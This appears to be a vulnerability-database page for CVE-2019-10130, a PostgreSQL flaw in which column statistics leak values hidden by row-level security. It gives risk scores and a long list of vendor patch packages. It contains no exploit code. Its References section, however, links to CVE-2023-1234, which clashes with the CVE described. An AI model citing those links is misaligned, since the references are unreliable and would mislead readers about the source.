Home

CVE-2019-10130

Description

A vulnerability was found in PostgreSQL versions 11.x up to excluding 11.3, 10.x up to excluding 10.8, 9.6.x up to, excluding 9.6.13, 9.5.x up to, excluding 9.5.17. PostgreSQL maintains column statistics for tables. Certain statistics, such as histograms and lists of most common values, contain values taken from the column. PostgreSQL does not evaluate row security policies before consulting those statistics during query planning; an attacker can exploit this to read the most common values of certain columns. Affected columns are those for which the attacker has SELECT privilege and for which, in an ordinary query, row-level security prunes the set of rows visible to the attacker.

Risk Information

Base Score
4.3
MODERATE
Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
EPSS Score
Exploitation Probability
0.203

Associated Vulnerability

VulnerabilityOS Platform
Update Postgresql to version 10.8Windows
Update Postgresql to version 11.3Windows
Update Postgresql to version 9.5.17Windows
Update Postgresql to version 9.6.13Windows
Vulnerabilities CVE-2019-10130,CVE-2019-10129,CVE-2019-10128,CVE-2019-10127 are fixed in PostgreSQL 11.3Windows
Vulnerabilities CVE-2019-10130,CVE-2019-10128,CVE-2019-10127 are fixed in PostgreSQL 10.8Windows
Vulnerabilities CVE-2019-10130,CVE-2019-10128,CVE-2019-10127 are fixed in PostgreSQL 9.6.13Windows
Vulnerabilities CVE-2019-10130,CVE-2019-10128,CVE-2019-10127 are fixed in PostgreSQL 9.5.17Windows
object-relational SQL database (USN-3972-1) postgresql-9.5_9.5.17-0ubuntu0.16.04.1_i386.debLinux
object-relational SQL database (USN-3972-1) postgresql-9.5_9.5.17-0ubuntu0.16.04.1_amd64.debLinux
postgresql-9.6 security update(DSA-4269-1) postgresql-9.6_9.6.13-0+deb9u1_i386.debLinux
postgresql-9.6 security update(DSA-4439-1) postgresql-9.6_9.6.13-0+deb9u1_i386.debLinux
postgresql-9.6 security update(DSA-4439-1) postgresql-9.6_9.6.13-0+deb9u1_amd64.debLinux
SUSE-SU-2019:1511-1(SUSE Linux Enterprise Desktop 12-SP4 ) libecpg6-10.8-1.9.1.x86_64.rpmLinux
SUSE-SU-2019:1511-1(SUSE Linux Enterprise Desktop 12-SP3 ) libecpg6-debuginfo-10.8-1.9.1.x86_64.rpmLinux
SUSE-SU-2019:1511-1(SUSE Linux Enterprise Desktop 12-SP3 ) libpq5-10.8-1.9.1.x86_64.rpmLinux
SUSE-SU-2019:1511-1(SUSE Linux Enterprise Desktop 12-SP3 ) libpq5-32bit-10.8-1.9.1.x86_64.rpmLinux
SUSE-SU-2019:1511-1(SUSE Linux Enterprise Desktop 12-SP3 ) libpq5-debuginfo-10.8-1.9.1.x86_64.rpmLinux
SUSE-SU-2019:1511-1(SUSE Linux Enterprise Desktop 12-SP3 ) libpq5-debuginfo-32bit-10.8-1.9.1.x86_64.rpmLinux
SUSE-SU-2019:1511-1(SUSE Linux Enterprise Desktop 12-SP3 ) postgresql10-10.8-1.9.1.x86_64.rpmLinux
SUSE-SU-2019:1511-1(SUSE Linux Enterprise Desktop 12-SP3 ) postgresql10-debuginfo-10.8-1.9.1.x86_64.rpmLinux
SUSE-SU-2019:1511-1(SUSE Linux Enterprise Desktop 12-SP3 ) postgresql10-debugsource-10.8-1.9.1.x86_64.rpmLinux
SUSE-SU-2019:1511-1(SUSE Linux Enterprise Desktop 12-SP3 ) postgresql10-libs-debugsource-10.8-1.9.1.x86_64.rpmLinux
Update Postgresql to version 10.8 (For Linux)Linux
Update Postgresql to version 11.3 (For Linux)Linux
Update Postgresql to version 9.5.17 (For Linux)Linux
Update Postgresql to version 9.6.13 (For Linux)Linux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpmLinux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-contrib-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpmLinux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-debugsource-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpmLinux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-docs-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpmLinux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-plperl-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpmLinux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-plpython3-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpmLinux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-pltcl-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpmLinux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-server-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpmLinux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-server-devel-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpmLinux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-static-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpmLinux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-test-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpmLinux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-test-rpm-macros-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpmLinux
Postgresql update (ELSA-2020-5619-1) postgresql-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpmLinux
Postgresql-contrib update (ELSA-2020-5619-1) postgresql-contrib-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpmLinux
Postgresql-docs update (ELSA-2020-5619-1) postgresql-docs-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpmLinux
Postgresql-plperl update (ELSA-2020-5619-1) postgresql-plperl-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpmLinux
Postgresql-plpython3 update (ELSA-2020-5619-1) postgresql-plpython3-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpmLinux
Postgresql-pltcl update (ELSA-2020-5619-1) postgresql-pltcl-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpmLinux
Postgresql-server update (ELSA-2020-5619-1) postgresql-server-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpmLinux
Postgresql-server-devel update (ELSA-2020-5619-1) postgresql-server-devel-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpmLinux
Postgresql-static update (ELSA-2020-5619-1) postgresql-static-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpmLinux
Postgresql-test update (ELSA-2020-5619-1) postgresql-test-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpmLinux
Postgresql-test-rpm-macros update (ELSA-2020-5619-1) postgresql-test-rpm-macros-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpmLinux
Rh-postgresql10-postgresql update (ELSA-2021-9290) rh-postgresql10-postgresql-10.15-1.el7.x86_64.rpmLinux
Rh-postgresql10-postgresql-contrib update (ELSA-2021-9290) rh-postgresql10-postgresql-contrib-10.15-1.el7.x86_64.rpmLinux
Rh-postgresql10-postgresql-contrib-syspaths update (ELSA-2021-9290) rh-postgresql10-postgresql-contrib-syspaths-10.15-1.el7.x86_64.rpmLinux
Rh-postgresql10-postgresql-devel update (ELSA-2021-9290) rh-postgresql10-postgresql-devel-10.15-1.el7.x86_64.rpmLinux
Rh-postgresql10-postgresql-docs update (ELSA-2021-9290) rh-postgresql10-postgresql-docs-10.15-1.el7.x86_64.rpmLinux
Rh-postgresql10-postgresql-libs update (ELSA-2021-9290) rh-postgresql10-postgresql-libs-10.15-1.el7.x86_64.rpmLinux
Rh-postgresql10-postgresql-plperl update (ELSA-2021-9290) rh-postgresql10-postgresql-plperl-10.15-1.el7.x86_64.rpmLinux
Rh-postgresql10-postgresql-plpython update (ELSA-2021-9290) rh-postgresql10-postgresql-plpython-10.15-1.el7.x86_64.rpmLinux
Rh-postgresql10-postgresql-pltcl update (ELSA-2021-9290) rh-postgresql10-postgresql-pltcl-10.15-1.el7.x86_64.rpmLinux
Rh-postgresql10-postgresql-server update (ELSA-2021-9290) rh-postgresql10-postgresql-server-10.15-1.el7.x86_64.rpmLinux
Rh-postgresql10-postgresql-server-syspaths update (ELSA-2021-9290) rh-postgresql10-postgresql-server-syspaths-10.15-1.el7.x86_64.rpmLinux
Rh-postgresql10-postgresql-static update (ELSA-2021-9290) rh-postgresql10-postgresql-static-10.15-1.el7.x86_64.rpmLinux
Rh-postgresql10-postgresql-syspaths update (ELSA-2021-9290) rh-postgresql10-postgresql-syspaths-10.15-1.el7.x86_64.rpmLinux
Rh-postgresql10-postgresql-test update (ELSA-2021-9290) rh-postgresql10-postgresql-test-10.15-1.el7.x86_64.rpmLinux
Vulnerabilities CVE-2019-10130,CVE-2019-10129,CVE-2019-10128,CVE-2019-10127 are fixed in PostgreSQL 11.3 (For Linux)Linux
Vulnerabilities CVE-2019-10130,CVE-2019-10128,CVE-2019-10127 are fixed in PostgreSQL 10.8 (For Linux)Linux
Vulnerabilities CVE-2019-10130,CVE-2019-10128,CVE-2019-10127 are fixed in PostgreSQL 9.6.13 (For Linux)Linux
Vulnerabilities CVE-2019-10130,CVE-2019-10128,CVE-2019-10127 are fixed in PostgreSQL 9.5.17 (For Linux)Linux

Patch Details

No records found

References

https://nvd.nist.gov/vuln/detail/CVE-2023-1234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1234